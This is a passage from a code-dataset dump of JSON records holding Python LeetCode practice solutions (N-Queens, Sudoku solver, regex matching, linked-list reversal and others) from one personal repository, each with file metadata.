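print(Solution().pathSum(root, 22))  # expected: [[5, 4, 11, 2], [5, 8, 4, 5]]
```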
{
"alpha_fraction": 0.4274509847164154,
"alphanum_fraction": 0.45359477400779724,
"avg_line_length": 27.370370864868164,
"blob_id": "ec9cd6558f61676d406c7907865fdef645f5d7df",
"content_id": "cc85c0935a0cbe9e3d6180ce05969ba8ab233419",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 765,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 27,
"path": "/N-Queens II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\nclass Solution:\n # @return an integer\n def totalNQueens(self, n):\n '''\n Follow up for N-Queens problem.\n\nNow, instead outputting board configurations, return the total number of distinct solutions.\n '''\n def dfs(ith, n, lr, rl, ud):\n if ith == n:\n return 1\n ones = (1 << n) - 1\n count = 0\n for i in range(1, n + 1):\n k = 1 << (n - i)\n if (k & lr) + (k & rl) + (k & ud) > 0:\n continue\n count += dfs(ith + 1, n, (lr | k) >> 1, ((rl | k) << 1) & ones, ud | k)\n return count\n return dfs(0, n, 0, 0, 0)\n\nn1 = 12\nn = n1\nprint(n)\nres = Solution.totalNQueens(Solution(), n)\nprint(res)"
},
{
"alpha_fraction": 0.41681259870529175,
"alphanum_fraction": 0.4500875771045685,
"avg_line_length": 21,
"blob_id": "e866acb88ff47edd9eb8a072a55ef26295bc40d4",
"content_id": "2c8af82e6ee116fb81471bc842a19ad51abfe557",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 571,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 26,
"path": "/Excel Sheet Column Title.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n '''\n Given a positive integer, return its corresponding column title as appear in an Excel sheet.\n\nFor example:\n\n 1 -> A\n 2 -> B\n 3 -> C\n ...\n 26 -> Z\n 27 -> AA\n 28 -> AB \n '''\n # @return a string\n def convertToTitle(self, num):\n dic = ['Z']\n for i in range(ord('A'), ord('Z')):\n dic.append(chr(i))\n ans = []\n while num > 0:\n ans.append(dic[num % 26])\n if num % 26 == 0:\n num -= 26\n num //= 26\n return \"\".join(reversed(ans))"
},
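The loop above effectively converts to bijective base-26: there is no zero digit, so 'Z' absorbs a borrow (num -= 26) whenever num is an exact multiple of 26. A few spot checks, assuming the Solution class above:

```python
ss = Solution()
for n in (1, 26, 27, 28, 52, 703):
    print(n, ss.convertToTitle(n))
# expected: 1 A, 26 Z, 27 AA, 28 AB, 52 AZ, 703 AAA
```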
{
"alpha_fraction": 0.4053627848625183,
"alphanum_fraction": 0.4250788688659668,
"avg_line_length": 31.512821197509766,
"blob_id": "37eeaf2d747b4e1247d2d9d8d7b9d88d907e055a",
"content_id": "295f876c71cdf8e354677a930a3a2ab47f3005e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1268,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 39,
"path": "/Unique Binary Search Trees II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @return a list of tree node\n def generateTrees(self, n):\n '''\n Given n, generate all structurally unique BST's (binary search trees) that store values 1...n.\n\nFor example,\nGiven n = 3, your program should return all 5 unique BST's shown below.\n\n 1 3 3 2 1\n \\ / / / \\ \\\n 3 2 1 1 3 2\n / / \\ \\\n 2 1 2 3\n\nconfused what \"{1,#,2,3}\" means? > read more on how binary tree is serialized on OJ.\n '''\n def genTree(l, r):\n if l > r:\n return [None]\n res = []\n for i in range(l, r + 1):\n left = genTree(l, i - 1)\n right = genTree(i + 1, r)\n for j in range(len(left)):\n for k in range(len(right)):\n node = TreeNode(i)\n node.left = left[j]\n node.right = right[k]\n res.append(node)\n return res\n return genTree(1, n)\n"
},
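A driver sketch for generateTrees, assuming TreeNode is defined in the same module (the Solution above instantiates it by name); for n = 3 it should yield the five trees from the docstring. The serialize helper is hypothetical:

```python
class TreeNode:
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None

def serialize(node):
    # hypothetical helper: one-line preorder rendering for comparison
    if node is None:
        return '#'
    return '%d(%s,%s)' % (node.val, serialize(node.left), serialize(node.right))

trees = Solution().generateTrees(3)
print(len(trees))  # expected: 5 (the Catalan number C_3)
for t in trees:
    print(serialize(t))
```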
{
"alpha_fraction": 0.5007012486457825,
"alphanum_fraction": 0.5170640349388123,
"avg_line_length": 23.31818199157715,
"blob_id": "8ab03869a7d00d416a338ae70fa49b2861ed1eb3",
"content_id": "8aa1d000c7da33465d574b1bb5ffe8c799e9ddd2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2139,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 88,
"path": "/Reverse Nodes in k-Group.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param head, a ListNode\n # @param k, an integer\n # @return a ListNode\n def reverseKGroup(self, head, k):\n '''\n Given a linked list, reverse the nodes of a linked list k at a time and return its modified list.\n\nIf the number of nodes is not a multiple of k then left-out nodes in the end should remain as it is.\n\nYou may not alter the values in the nodes, only nodes itself may be changed.\n\nOnly constant memory is allowed.\n\nFor example,\nGiven this linked list: 1->2->3->4->5\n\nFor k = 2, you should return: 2->1->4->3->5\n\nFor k = 3, you should return: 3->2->1->4->5 \n '''\n fast = head\n slow = head\n dummyHead = ListNode(0)\n dummyHead.next = head\n dht = dummyHead\n while fast:\n for i in range(k):\n if not fast:\n dht.next = slow\n return dummyHead.next\n fast = fast.next\n thisk = self.reverseList(slow, fast)\n dht.next = thisk[0]\n dht = thisk[1]\n slow = fast\n return dummyHead.next\n\n def reverseList(self, start, end):\n pre = None\n t = start\n while t != end:\n x = t.next\n t.next = pre\n pre = t\n t = x\n return [pre, start]\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n def __str__(self):\n # print(\"in str\")\n tmp = self\n strs = []\n while tmp.next is not None:\n strs.append(str(tmp.val) + \"->\")\n tmp = tmp.next\n else:\n strs.append(str(tmp.val) + \";\")\n return \"\".join(strs)\n\n\nin0 = [1, 2, 4, 3, 2]\nin1 = [1, 2, 3]\nin2 = [1]\n\nins = [in1]\n\nfor tin in ins:\n head = ListNode(0)\n tail = head\n for val in tin:\n tail.next = ListNode(val)\n tail = tail.next\n ss = Solution()\n print(len(tin), tin)\n # print(head)\n print(ss.reverseKGroup(head.next, 2))\n print()"
},
{
"alpha_fraction": 0.4084967374801636,
"alphanum_fraction": 0.4444444477558136,
"avg_line_length": 23.5,
"blob_id": "623fbd4737cfd591a09425c5509174d31c68b9b1",
"content_id": "6a2e41c11d633512b0ce48108f6688a87151d5da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1226,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 50,
"path": "/Permutation Sequence.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\nclass Solution:\n # @return a string\n def getPermutation(self, n, k):\n '''\n The set [1,2,3,…,n] contains a total of n! unique permutations.\n\nBy listing and labeling all of the permutations in order,\nWe get the following sequence (ie, for n = 3):\n\n \"123\"\n \"132\"\n \"213\"\n \"231\"\n \"312\"\n \"321\"\n\nGiven n and k, return the kth permutation sequence.\n\nNote: Given n will be between 1 and 9 inclusive.\n '''\n def fac(n):\n ans = 1\n for i in range(1, n + 1):\n ans *= i\n return ans\n def findMthFalse(used, m):\n for i in range(len(used)):\n if not used[i]:\n m -= 1\n if m == 0:\n used[i] = True\n return i\n return -1\n ith = 0\n used = [False] * n\n ans = ''\n nfac = fac(n)\n while ith < n:\n nfac /= n - ith\n ith += 1\n m = (k - 1) // nfac + 1\n k -= (m - 1) * nfac\n ans += chr(findMthFalse(used, m) + 1 + ord('0'))\n return ans\n\ns1 = [3, 4]\ns = s1\nprint(s)\nprint(Solution.getPermutation(Solution(), s[0], s[1]))"
},
{
"alpha_fraction": 0.4420485198497772,
"alphanum_fraction": 0.4652291238307953,
"avg_line_length": 27.106060028076172,
"blob_id": "446813f752723ca39aac60c8ae2e68ead03dc3c1",
"content_id": "50c2d5ddeb71fa9bce3b5c62cbddf00125decb50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1855,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 66,
"path": "/Valid Number.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param s, a string\n # @return a boolean\n def isNumber(self, s):\n '''\n Validate if a given string is numeric.\n\nSome examples:\n\"0\" => true\n\" 0.1 \" => true\n\"abc\" => false\n\"1 a\" => false\n\"2e10\" => true\n\nNote: It is intended for the problem statement to be ambiguous. You should gather all requirements up front before implementing one. \n '''\n s = s.strip()\n if len(s) == 0:\n return False\n if s[0] in set(['+', '-']):\n s = s[1:]\n eposs = [pos for pos in range(len(s)) if s[pos] == 'e' or s[pos] == 'E']\n if len(eposs) > 1:\n return False\n epos = len(s)\n if len(eposs) == 1:\n epos = eposs[0]\n dotposs = [pos for pos in range(epos) if s[pos] == '.']\n if len(dotposs) > 1:\n return False\n dotpos = epos\n if len(dotposs) == 1:\n dotpos = dotposs[0]\n if epos == len(s) - 1 or epos == 0:\n return False\n first = s\n if epos != len(s):\n first = s[:epos]\n second = s[epos + 1:]\n if second[0] == '+' or second[0] == '-':\n second = second[1:]\n if not second.isdigit():\n return False\n if dotpos != epos:\n firstone = first[:dotpos]\n firsttwo = first[dotpos + 1:]\n if not ((firstone.isdigit() or firstone == '')\n and (firsttwo.isdigit() or firsttwo == '')):\n return False\n if firstone == '' and firsttwo == '':\n return False\n else:\n if not (first == '' or first.isdigit()):\n return False\n return True\n\ns0 = '.e10'\ns1 = \"-1.e10\"\ns2 = \"0\"\ns3 = \" 0.1 \"\ns4 = \"abc\"\ns5 = \"1 a\"\ns6 = \"2e10\"\ns = s0\nprint(s)\nprint(Solution.isNumber(Solution(), s))\n"
},
{
"alpha_fraction": 0.3608340919017792,
"alphanum_fraction": 0.49592021107673645,
"avg_line_length": 30.542856216430664,
"blob_id": "f6b24ef17e368b498d0d3cd038a164299ca2fdb2",
"content_id": "458873ff18f02cd278b90af6ae336bf95acc2977",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1103,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 35,
"path": "/Restore IP Addresses.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param s, a string\n # @return a list of strings\n def restoreIpAddresses(self, s):\n '''\n Given a string containing only digits, restore it by returning all possible valid IP address combinations.\n\nFor example:\nGiven \"25525511135\",\n\nreturn [\"255.255.11.135\", \"255.255.111.35\"]. (Order does not matter) \n '''\n def dfs(s, str, n, now, res):\n if len(str) == 4\\\n or (len(str) == 3 and str > '255')\\\n or (len(str) > 1 and str[0] == '0')\\\n or (s == '' and n != 3)\\\n or (n > 3):\n return\n if s == '':\n res.append(now[1:] + '.' + str)\n return\n dfs(s[1:], str + s[0], n, now, res)\n if str != '':\n dfs(s[1:], s[0], n + 1, now + '.' + str, res)\n res = []\n dfs(s, '', 0, '', res)\n return res\n\ns1 = '25525511135'\ns2 = \"010010\"\ns3 = '111111111111111111111111111111111111111111111111111111111111111111111111111111'\ns = s3\nprint(s)\nprint(Solution.restoreIpAddresses(Solution(), s))"
},
{
"alpha_fraction": 0.4513089060783386,
"alphanum_fraction": 0.49633508920669556,
"avg_line_length": 30.866666793823242,
"blob_id": "1fa43bb736af987797be634c62129282f598ab2f",
"content_id": "a5556e8c5d81cfb909a13589b33b714e4024bc96",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 955,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 30,
"path": "/Multiply Strings.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param num1, a string\n # @param num2, a string\n # @return a string\n def multiply(self, num1, num2):\n '''\n Given two numbers represented as strings, return multiplication of the numbers as a string.\n\nNote: The numbers can be arbitrarily large and are non-negative.\n '''\n a = [ord(c) - ord('0') for c in num1]\n a.reverse()\n b = [ord(c) - ord('0') for c in num2]\n b.reverse()\n c = [0] * (len(a) + len(b))\n for i in range(len(a)):\n for j in range(len(b)):\n c[i + j] += a[i] * b[j]\n for i in range(len(a) + len(b) - 1):\n c[i + 1] += c[i] // 10\n c[i] %= 10\n while len(c) > 1 and c[len(c) - 1] == 0:\n c.pop()\n c.reverse()\n return ''.join([chr(i + ord('0')) for i in c])\n\nnum1 = ['1234567890', '9876543210']\nnum = num1\nprint(num)\nprint(Solution.multiply(Solution(), num[0], num[1]))"
},
{
"alpha_fraction": 0.4746136963367462,
"alphanum_fraction": 0.49558499455451965,
"avg_line_length": 26.454545974731445,
"blob_id": "38e39688735735b39e4e00bd84321f67676d8bea",
"content_id": "4058dabab882346c98e50d1d0870d8b87c2197bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 906,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 33,
"path": "/Rotate Image.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param matrix, a list of lists of integers\n # @return a list of lists of integers\n def rotate(self, matrix):\n '''\n You are given an n x n 2D matrix representing an image.\n\nRotate the image by 90 degrees (clockwise).\n\nFollow up:\nCould you do this in-place?\n '''\n n = len(matrix)\n l = 0\n r = n\n while r - l > 1:\n for i in range(l, r - 1):\n matrix[l][i], matrix[i][r - 1], matrix[r - 1][r - 1 - i + l], matrix[r - 1 - i + l][l] = \\\n matrix[r - 1 - i + l][l], matrix[l][i], matrix[i][r - 1], matrix[r - 1][r - 1 - i + l]\n l += 1\n r -= 1\n return matrix\n\nn = 10\nm = []\nfor i in range(n):\n m.append([i * n + j + 1 for j in range(n)])\nfor i in range(len(m)):\n print(m[i])\nres = Solution.rotate(Solution(), m)\nprint()\nfor i in range(len(res)):\n print(res[i])\n"
},
{
"alpha_fraction": 0.42497318983078003,
"alphanum_fraction": 0.44694533944129944,
"avg_line_length": 30.108333587646484,
"blob_id": "05960c8a1a20891048386c382e0c9ddfd75b7434",
"content_id": "e74041add7dafe2c07c752423723a489089e130e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3732,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 120,
"path": "/Sudoku Solver.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param board, a 9x9 2D array\n # Solve the Sudoku by modifying the input board in-place.\n # Do not return any value.\n def solveSudoku(self, board):\n '''\n Write a program to solve a Sudoku puzzle by filling the empty cells.\n\nEmpty cells are indicated by the character '.'.\n\nYou may assume that there will be only one unique solution.\n\n\nA sudoku puzzle...\n\n\n...and its solution numbers marked in red. \n '''\n row = [set() for i in range(9)]\n col = [set() for i in range(9)]\n cube = [set() for i in range(9)]\n blanks = []\n for i in range(9):\n for j in range(9):\n x = board[i][j]\n k = i // 3 * 3 + j // 3\n if x == '.':\n blanks.append([i, j, k])\n continue\n row[i].add(x)\n col[j].add(x)\n cube[k].add(x)\n self.dfs(board, blanks, 0, row, col, cube)\n\n def dfs(self, board, blanks, ith, row, col, cube):\n if ith == len(blanks):\n return True\n x, y, k = blanks[ith]\n for i in range(1, 10):\n c = chr(ord('0') + i)\n if c in row[x] or c in col[y] or c in cube[k]:\n continue\n row[x].add(c)\n col[y].add(c)\n cube[k].add(c)\n board[x][y] = c\n res = self.dfs(board, blanks, ith + 1, row, col, cube)\n if res:\n return True\n board[x][y] = '.'\n row[x].remove(c)\n col[y].remove(c)\n cube[k].remove(c)\n\n # @param board, a 9x9 2D array\n # Solve the Sudoku by modifying the input board in-place.\n # Do not return any value.\n def solveSudoku_usingArray(self, board):\n '''\n Write a program to solve a Sudoku puzzle by filling the empty cells.\n\nEmpty cells are indicated by the character '.'.\n\nYou may assume that there will be only one unique solution.\n\n\nA sudoku puzzle...\n\n\n...and its solution numbers marked in red.\n '''\n row = [[False] * 10 for i in range(9)]\n col = [[False] * 10 for i in range(9)]\n cube = [[False] * 10 for i in range(9)]\n blanks = []\n for i in range(9):\n for j in range(9):\n x = ord(board[i][j]) - ord('0')\n k = i // 3 * 3 + j // 3\n if board[i][j] == '.':\n blanks.append([i, j, k])\n continue\n row[i][x] = True\n col[j][x] = True\n cube[k][x] = True\n self.dfs_usingArray(board, blanks, 0, row, col, cube)\n\n def dfs_usingArray(self, board, blanks, ith, row, col, cube):\n if ith == len(blanks):\n return True\n x, y, k = blanks[ith]\n for i in range(1, 10):\n c = chr(ord('0') + i)\n if row[x][i] or col[y][i] or cube[k][i]:\n continue\n row[x][i] = True\n col[y][i] = True\n cube[k][i] = True\n board[x][y] = c\n res = self.dfs(board, blanks, ith + 1, row, col, cube)\n if res:\n return True\n board[x][y] = '.'\n row[x][i] = False\n col[y][i] = False\n cube[k][i] = False\n\na0 = [\"....9..9.\",\".........\",\"4..89...1\",\"4.3......\",\".........\",\"...5..9..\",\"....1.7..\",\"...4.....\",\".....6...\"]\na1 = [\".87654321\",\"2........\",\"3........\",\"4........\",\"5........\",\"6........\",\"7........\",\"8........\",\"9........\"]\na2 = []\nfor i in range(9):\n a2.append([])\n for j in range(9):\n a2[i].append(a0[i][j])\na = a2\nfor i in range(9):\n print(a[i])\nprint(Solution.solveSudoku(Solution(), a))\nfor i in range(9):\n print(a[i])"
},
{
"alpha_fraction": 0.4754098355770111,
"alphanum_fraction": 0.4888226389884949,
"avg_line_length": 24.30188751220703,
"blob_id": "97e1f2fc8ac7173c00ae50d9e4a333cf272da9b6",
"content_id": "4a5077cdc4b8e6f4f0be659c9028d9fda29d2849",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1348,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 53,
"path": "/Reverse Linked List II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param head, a ListNode\n # @param m, an integer\n # @param n, an integer\n # @return a ListNode\n def reverseBetween(self, head, m, n):\n '''\n Reverse a linked list from position m to n. Do it in-place and in one-pass.\n\nFor example:\nGiven 1->2->3->4->5->NULL, m = 2 and n = 4,\n\nreturn 1->4->3->2->5->NULL.\n\nNote:\nGiven m, n satisfy the following condition:\n1 ≤ m ≤ n ≤ length of list. \n '''\n dummyHead = ListNode(0)\n dummyHead.next = head\n postPre = None\n preTail = None\n revHead = None\n t = dummyHead\n k = 0\n while k < n:\n if k == m - 1:\n preTail = t\n revHead = t.next\n k += 1\n t = t.next\n postPre = t.next\n t.next = None\n def reverseList(head):\n pre = None\n tail = head\n while head:\n t = head\n head = head.next\n t.next = pre\n pre = t\n return [pre, tail]\n revHead, revTail = reverseList(revHead)\n preTail.next = revHead\n revTail.next = postPre\n return dummyHead.next\n\n"
},
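Replaying the docstring example through reverseBetween above; a sketch assuming the Solution class is in scope, with ListNode supplied:

```python
class ListNode:
    def __init__(self, x):
        self.val = x
        self.next = None

head = tail = ListNode(1)
for v in (2, 3, 4, 5):
    tail.next = ListNode(v)
    tail = tail.next

node = Solution().reverseBetween(head, 2, 4)
vals = []
while node:
    vals.append(node.val)
    node = node.next
print(vals)  # expected: [1, 4, 3, 2, 5]
```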
{
"alpha_fraction": 0.41695302724838257,
"alphanum_fraction": 0.4272623062133789,
"avg_line_length": 29.10344886779785,
"blob_id": "68bce2e33a55fe79af4dd7d66b4365d147e29953",
"content_id": "318e4cc33c7534f714f21fe8c9734e79ba2ac418",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 873,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 29,
"path": "/Remove Element.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param A a list of integers\n # @param elem an integer, value need to be removed\n # @return an integer\n def removeElement(self, A, elem):\n '''\n Given an array and a value, remove all instances of that value in place and return the new length.\n\nThe order of elements can be changed. It doesn't matter what you leave beyond the new length. \n '''\n if len(A) == 0:\n return 0\n l = 0\n r = len(A) - 1\n while l < r:\n while l < r and A[l] != elem:\n l += 1\n while l < r and A[r] == elem:\n r -= 1\n if l < r:\n t = A[l]\n A[l] = A[r]\n A[r] = t\n l += 1\n r -= 1\n res = r + 1\n if A[r] == elem:\n res = r\n return res\n"
},
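Because the sweep above swaps removed values toward the tail rather than shifting, the surviving prefix is not in its original order; only its contents and the returned length matter. A quick check, assuming the Solution class above:

```python
A = [3, 1, 2, 3, 4, 3]
n = Solution().removeElement(A, 3)
print(n, sorted(A[:n]))  # expected: 3 [1, 2, 4]
```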
{
"alpha_fraction": 0.48554033041000366,
"alphanum_fraction": 0.509132444858551,
"avg_line_length": 26.39583396911621,
"blob_id": "dc6b10cc6f80b5d21cf1bfd2223a89b550dca0f2",
"content_id": "517136a78c838c89a182a861438b1b795576472e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1314,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 48,
"path": "/Jump Game II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param A, a list of integers\n # @return an integer\n def jump(self, A):\n '''\n Given an array of non-negative integers, you are initially positioned at the first index of the array.\n\nEach element in the array represents your maximum jump length at that position.\n\nYour goal is to reach the last index in the minimum number of jumps.\n\nFor example:\nGiven array A = [2,3,1,1,4]\n\nThe minimum number of jumps to reach the last index is 2. (Jump 1 step from index 0 to 1, then 3 steps to the last index.) \n '''\n return self.on_solution(A)\n #return self.dp_solution(A)\n\n def on_solution(self, A):\n n = len(A)\n l = 0\n r = 1\n step = 0\n while r < n:\n nextr = -1\n for i in range(l, r):\n if A[i] + i > nextr:\n nextr = A[i] + i\n l = r\n r = nextr + 1\n step += 1\n return step\n\n #TLE\n def dp_solution(self, A):\n dp = [len(A)] * len(A)\n dp[0] = 0\n for i in range(1, len(A)):\n for j in range(i - 1, -1, -1):\n if A[j] + j >= i:\n dp[i] = min(dp[i], dp[j] + 1)\n return dp[len(A) - 1]\n\na1 = [1,2,1,1,1]\na = a1\nprint(a)\nprint(Solution.dp_solution(Solution(), a))"
},
{
"alpha_fraction": 0.45378151535987854,
"alphanum_fraction": 0.4789915978908539,
"avg_line_length": 32.65217208862305,
"blob_id": "5eadc14adae554e5cdea5537b4129896c5d138a1",
"content_id": "f867495cd21a7046a59c37615c7370e03b6b4580",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1561,
"license_type": "no_license",
"max_line_length": 137,
"num_lines": 46,
"path": "/Regular Expression Matching.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "#coding=utf-8\nclass Solution:\n # @return a boolean\n def isMatch(self, s, p):\n \"\"\"\n Implement regular expression matching with support for '.' and '*'.\n\n'.' Matches any single character.\n'*' Matches zero or more of the preceding element.\n\nThe matching should cover the entire input string (not partial).\n\nThe function prototype should be:\nbool isMatch(const char *s, const char *p)\n\nSome examples:\nisMatch(\"aa\",\"a\") → false\nisMatch(\"aa\",\"aa\") → true\nisMatch(\"aaa\",\"aa\") → false\nisMatch(\"aa\", \"a*\") → true\nisMatch(\"aa\", \".*\") → true\nisMatch(\"ab\", \".*\") → true\nisMatch(\"aab\", \"c*a*b\") → true\n \"\"\"\n n = len(s)\n m = len(p)\n match = [[False] * (m + 1) for row in range(n + 1)]\n match[0][0] = True\n for i in range(0, n + 1):\n for j in range(0, m + 1):\n if i > 0 or j > 0:\n match[i][j] = (i >= 1 and j >= 1 and match[i - 1][j - 1] and self.matchSingle(s[i - 1], p[j - 1])) \\\n or (i >= 1 and j >= 2 and match[i - 1][j] and p[j - 1] == '*' and self.matchSingle(s[i - 1], p[j - 2])) \\\n or (j >= 1 and match[i][j - 1] and p[j - 1] == '*') \\\n or (j >= 2 and match[i][j - 2] and p[j - 1] == '*')\n #print(i, j, s[:i], p[:j], match[i][j])\n return match[n][m]\n\n def matchSingle(self, s1, s2):\n return s1 == s2 or s2 == '.'\n\ns1 = [\"aaa\", \".*\"]\ns2 = [\"aab\", \"c*a*b\"]\ns = s2\nprint(s)\nprint(Solution.isMatch(Solution(), s[0], s[1]))"
},
{
"alpha_fraction": 0.420634925365448,
"alphanum_fraction": 0.4334554374217987,
"avg_line_length": 26.779661178588867,
"blob_id": "be231f3b7dc1c1d1dc1291f262f3e0775b37ecd5",
"content_id": "721bea38311adeb0d6d26f8d21cf66f66563a9f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1639,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 59,
"path": "/N-Queens.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\nclass Solution:\n # @return a list of lists of string\n def solveNQueens(self, n):\n '''\n The n-queens puzzle is the problem of placing n queens on an n×n chessboard such that no two queens attack each other.\n\nGiven an integer n, return all distinct solutions to the n-queens puzzle.\n\nEach solution contains a distinct board configuration of the n-queens' placement, where 'Q' and '.' both indicate a queen and an empty space respectively.\n\nFor example,\nThere exist two distinct solutions to the 4-queens puzzle:\n\n[\n [\".Q..\", // Solution 1\n \"...Q\",\n \"Q...\",\n \"..Q.\"],\n\n [\"..Q.\", // Solution 2\n \"Q...\",\n \"...Q\",\n \".Q..\"]\n]\n '''\n def dfs(ith, n, lr, rl, ud, now, res):\n if ith == n:\n so = []\n for i in range(n):\n s = ''\n for j in range(n):\n if j == now[i] - 1:\n s += 'Q'\n else:\n s += '.'\n so.append(s)\n res.append(so)\n return\n ones = (1 << n) - 1\n for i in range(1, n + 1):\n k = 1 << (n - i)\n if (k & lr) + (k & rl) + (k & ud) > 0:\n continue\n now.append(i)\n dfs(ith + 1, n, (lr | k) >> 1, ((rl | k) << 1) & ones, ud | k, now, res)\n now.pop()\n res = []\n dfs(0, n, 0, 0, 0, [], res)\n return res\n\nn1 = 6\nn = n1\nprint(n)\nres = Solution.solveNQueens(Solution(), n)\nfor so in res:\n for s in so:\n print(s)\n print('')"
},
{
"alpha_fraction": 0.4683544337749481,
"alphanum_fraction": 0.5134493708610535,
"avg_line_length": 27.75,
"blob_id": "2d4e5e7680e46e2d7571c0894fac8fa29403c24e",
"content_id": "e631b0597dc80dfea58a423bf97f85e30ef9595f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1264,
"license_type": "no_license",
"max_line_length": 187,
"num_lines": 44,
"path": "/Trapping Rain Water.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param A, a list of integers\n # @return an integer\n def trap(self, A):\n '''\n Given n non-negative integers representing an elevation map where the width of each bar is 1, compute how much water it is able to trap after raining.\n\nFor example,\nGiven [0,1,0,2,1,0,1,3,2,1,2,1], return 6.\n\n\nThe above elevation map is represented by array [0,1,0,2,1,0,1,3,2,1,2,1]. In this case, 6 units of rain water (blue section) are being trapped. Thanks Marcos for contributing this image!\n '''\n n = len(A)\n area = 0\n maxi = -1\n maxv = -1\n for i in range(n):\n if A[i] > maxv:\n maxi = i\n maxv = A[i]\n area += self.findarea(A, maxi)\n A.reverse()\n area += self.findarea(A, n - maxi - 1)\n return area\n\n def findarea(self, A, maxi):\n if len(A) == 0:\n return 0\n thishigh = A[0]\n i = 0\n area = 0\n while i < maxi:\n while i < maxi and A[i] <= thishigh:\n area += thishigh - A[i]\n i += 1\n thishigh = A[i]\n return area\n\na0 = [0,1,0,2,1,0,1,3,2,1,2,1]\na1 = [5,2,1,2,1,5]\na = []\nprint(len(a), a)\nprint(Solution.trap(Solution(), a))"
},
{
"alpha_fraction": 0.4570673704147339,
"alphanum_fraction": 0.4689564108848572,
"avg_line_length": 28.705883026123047,
"blob_id": "ac3516fc79d8951b31706cb2eca931d4e862e30e",
"content_id": "fa857b9a54f4d8c53974893199af47c904ccdf1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1514,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 51,
"path": "/Palindrome Partitioning.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
